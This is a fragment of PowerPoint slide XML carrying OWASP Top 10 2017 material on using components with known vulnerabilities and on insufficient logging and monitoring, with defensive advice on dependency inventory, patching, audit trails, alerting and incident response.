              </a:rPr>
              <a:t/>
            </a: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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You are likely vulnerable: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know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.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any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, APIs and all components, runtime environments and libraries.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know if they are vulnerable. Either if you don’t research for this information or if you don’t scan them for vulnerabilities on a regular base.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fix or upgrade the underlying platform, frameworks and dependencies in a timely fashion. This commonly happens is environments when patching is a monthly or quarterly task under change control, which leaves organizations open to many days or months of unnecessary exposure to fixed vulnerabilities. This is likely the root cause of one of the largest breaches of all time. </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secure the components' configurations (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <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Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>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Software projects should have a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Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>versions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DependencyCheck</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5"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.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Only obtain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting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Many libraries and component do not create security patches for out of support or old versions, or it simply be unmaintained. If patching is not possible, consider deploying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to monitor, detect or protect against the discovered issue.</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Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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solidFill>
            <a:srgbClr val="83276B"/>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Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>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369987332"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit. </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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</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uses scans for users using a common password. He can take over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Insufficient logging, detection, monitoring and active response occurs any time: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Auditable events, such as logins, failed logins, and high value transactions are not logged.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of applications and APIs are not monitored for suspicious activity.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Alerting thresholds and response escalation as per the risk of the data held by the application is not in place or effective.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For larger and high performing organizations, the lack of active response, such as real time alerting and response activities such as blocking automated attacks on web applications and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>associated infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Controls: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>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5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Standard: V8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>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Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Guide: Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>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Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>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7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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8"/>
              </a:rPr>
              <a:t>CWE-223: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CWE-778: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>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As per the risk of the data stored or processed by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all login, access control failures, server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.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high value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append only database tables or similar.</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Establish effective monitoring and alerting such that suspicious activities are detected and responded within acceptable time periods.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Establish or adopt an incident response and recovery plan, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or later.</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commercial and open source application protection frameworks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>mod_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> with the OWASP Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and log correlation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custom dashboards and alerting. Penetration testing and scans by DAST tools (such as OWASP ZAP) should always trigger alerts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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solidFill>
            <a:srgbClr val="83276B"/>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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Logging &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Monitoring</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224133204"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
